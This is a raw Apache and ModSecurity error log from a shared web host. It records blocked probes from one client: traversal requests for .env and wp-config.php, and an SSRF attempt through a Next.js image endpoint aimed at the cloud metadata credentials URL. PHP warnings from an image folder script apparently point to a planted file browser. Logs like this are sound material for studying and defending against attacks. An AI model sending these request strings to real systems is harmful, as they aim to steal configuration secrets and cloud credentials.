[Tue May 12 02:49:57.596469 2026] [security2:error] [pid 1707624:tid 1707692] [client 45.148.10.238:19584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ5NbOxS7i6i_mT2NLJHAAAAEo"]
[Tue May 12 02:49:57.596646 2026] [security2:error] [pid 1707624:tid 1707692] [client 45.148.10.238:19584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ5NbOxS7i6i_mT2NLJHAAAAEo"]
[Tue May 12 02:49:57.738603 2026] [security2:error] [pid 1707624:tid 1707688] [client 45.148.10.238:19488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5M7OxS7i6i_mT2NLJGwAAAEY"]
[Tue May 12 02:49:57.765612 2026] [security2:error] [pid 1730207:tid 1730227] [client 45.148.10.238:19486] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RgQAAAVI"]
[Tue May 12 02:49:58.344044 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.238:19492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NTue9Sp-pIv_Bb6RhAAAAUE"]
[Tue May 12 02:49:58.372749 2026] [security2:error] [pid 1691274:tid 1691290] [client 45.148.10.238:19530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NVfdQaraX_prmqcgDQAAAA0"]
[Tue May 12 02:49:58.504528 2026] [security2:error] [pid 1709071:tid 1709105] [client 45.148.10.238:19490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NbvMumyrWMfSu7qquwAAANI"]
[Tue May 12 02:49:58.517526 2026] [security2:error] [pid 1730175:tid 1730201] [client 45.148.10.238:19540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NXo6NvB9WXx5V-57MAAAARg"]
[Tue May 12 02:49:58.520299 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.238:19568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NVfdQaraX_prmqcgDgAAAAY"]
[Tue May 12 02:49:58.526849 2026] [security2:error] [pid 1695975:tid 1695999] [client 45.148.10.238:19550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NdVI9ymHBxup74-NXAAAAJU"]
[Tue May 12 02:49:58.533013 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.238:19526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NDue9Sp-pIv_Bb6RgwAAAU8"]
[Tue May 12 02:49:58.586845 2026] [security2:error] [pid 1695975:tid 1695989] [client 45.148.10.238:19600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NdVI9ymHBxup74-NXQAAAIs"]
[Tue May 12 02:49:58.600678 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.238:19556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NTue9Sp-pIv_Bb6RhQAAAVY"]
[Tue May 12 02:49:58.661737 2026] [security2:error] [pid 1691274:tid 1691294] [client 45.148.10.238:19462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NVfdQaraX_prmqcgDwAAABI"]
[Tue May 12 02:49:58.731417 2026] [security2:error] [pid 1707624:tid 1707692] [client 45.148.10.238:19584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NbOxS7i6i_mT2NLJHAAAAEo"]
[Tue May 12 02:49:58.736007 2026] [security2:error] [pid 1695975:tid 1695988] [client 45.148.10.238:19524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NdVI9ymHBxup74-NXgAAAIo"]
[Tue May 12 02:49:58.802353 2026] [security2:error] [pid 1709071:tid 1709091] [client 45.148.10.238:19478] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5NbvMumyrWMfSu7qqvQAAAMQ"]
[Tue May 12 02:49:59.976491 2026] [security2:error] [pid 1730175:tid 1730177] [client 45.148.10.238:19760] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/wp-config.php"] [unique_id "agJ5N3o6NvB9WXx5V-57MQAAAQA"]
[Tue May 12 02:49:59.976691 2026] [security2:error] [pid 1730175:tid 1730177] [client 45.148.10.238:19760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/wp-config.php"] [unique_id "agJ5N3o6NvB9WXx5V-57MQAAAQA"]
[Tue May 12 02:49:59.993934 2026] [security2:error] [pid 1730207:tid 1730230] [client 45.148.10.238:19818] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/wp-config.php~"] [unique_id "agJ5Nzue9Sp-pIv_Bb6RiAAAAVU"]
[Tue May 12 02:49:59.994104 2026] [security2:error] [pid 1730207:tid 1730230] [client 45.148.10.238:19818] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/wp-config.php~"] [unique_id "agJ5Nzue9Sp-pIv_Bb6RiAAAAVU"]
[Tue May 12 02:50:02.140167 2026] [security2:error] [pid 1730207:tid 1730230] [client 45.148.10.238:19818] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5Nzue9Sp-pIv_Bb6RiAAAAVU"]
[Tue May 12 02:50:02.424552 2026] [security2:error] [pid 1730175:tid 1730177] [client 45.148.10.238:19760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5N3o6NvB9WXx5V-57MQAAAQA"]
[Tue May 12 02:50:04.622480 2026] [security2:error] [pid 1730175:tid 1730177] [client 45.148.10.238:19760] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJ5PHo6NvB9WXx5V-57OAAAAQA"]
[Tue May 12 02:50:04.623587 2026] [security2:error] [pid 1730175:tid 1730177] [client 45.148.10.238:19760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJ5PHo6NvB9WXx5V-57OAAAAQA"]
[Tue May 12 02:50:07.111389 2026] [security2:error] [pid 1730175:tid 1730177] [client 45.148.10.238:19760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5PHo6NvB9WXx5V-57OAAAAQA"]
[Tue May 12 02:50:07.176625 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.238:7420] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.labaujue.com"] [uri "/_next/image/"] [unique_id "agJ5P3o6NvB9WXx5V-57OwAAAQE"], referer: https://labaujue.com/_next/image/?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F&w=1200&q=75
[Tue May 12 02:50:07.177354 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.238:7420] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.labaujue.com"] [uri "/_next/image/"] [unique_id "agJ5P3o6NvB9WXx5V-57OwAAAQE"], referer: https://labaujue.com/_next/image/?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F&w=1200&q=75
[Tue May 12 02:50:09.839949 2026] [security2:error] [pid 1695975:tid 1695984] [client 45.148.10.238:7456] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJ5QdVI9ymHBxup74-NZgAAAIY"]
[Tue May 12 02:50:09.840658 2026] [security2:error] [pid 1695975:tid 1695984] [client 45.148.10.238:7456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJ5QdVI9ymHBxup74-NZgAAAIY"]
[Tue May 12 02:50:09.966989 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.238:7420] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.labaujue.com"] [uri "/index.php"] [unique_id "agJ5P3o6NvB9WXx5V-57OwAAAQE"], referer: https://labaujue.com/_next/image/?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F&w=1200&q=75
[Tue May 12 02:50:11.774932 2026] [security2:error] [pid 1695975:tid 1695984] [client 45.148.10.238:7456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5QdVI9ymHBxup74-NZgAAAIY"]
[Tue May 12 02:50:32.593245 2026] [authz_core:error] [pid 1691274:tid 1691291] [client 17.241.219.98:50934] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/library/error_log
[Tue May 12 02:50:35.679195 2026] [security2:error] [pid 1707624:tid 1707698] [client 43.153.204.189:33002] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pweil.com"] [uri "/"] [unique_id "agJ5W7OxS7i6i_mT2NLJNQAAAFA"]
PHP Warning:  filesize(): stat failed for /proc/112/task/112/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/112/task/112/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/112/task/112/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/112/task/112/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/112/task/112/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/112/task/112/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:50:48.440385 2026] [:error] [pid 1691274:tid 1691281] [client 74.7.242.63:55650] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/tag/ps4/
[Tue May 12 02:50:49.576794 2026] [security2:error] [pid 1695975:tid 1695994] [client 43.133.61.171:56250] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ5adVI9ymHBxup74-NiQAAAJA"]
[Tue May 12 02:51:40.071956 2026] [security2:error] [pid 1730207:tid 1730226] [client 43.153.192.98:33886] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/"] [unique_id "agJ5nDue9Sp-pIv_Bb6R0gAAAVE"]
[Tue May 12 02:51:51.241379 2026] [authz_core:error] [pid 1709071:tid 1709106] [client 47.128.28.185:16270] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/customize/error_log
[Tue May 12 02:51:54.022356 2026] [security2:error] [pid 1707624:tid 1707695] [client 216.73.216.117:64766] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cb18e98c91b310218dfafa92a78d0610||1778548913||1778548553"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agJ5qrOxS7i6i_mT2NLJbwAAAE0"]
[Tue May 12 02:51:54.022575 2026] [security2:error] [pid 1707624:tid 1707695] [client 216.73.216.117:64766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agJ5qrOxS7i6i_mT2NLJbwAAAE0"]
[Tue May 12 02:51:54.412920 2026] [security2:error] [pid 1707624:tid 1707695] [client 216.73.216.117:64766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJ5qrOxS7i6i_mT2NLJbwAAAE0"]
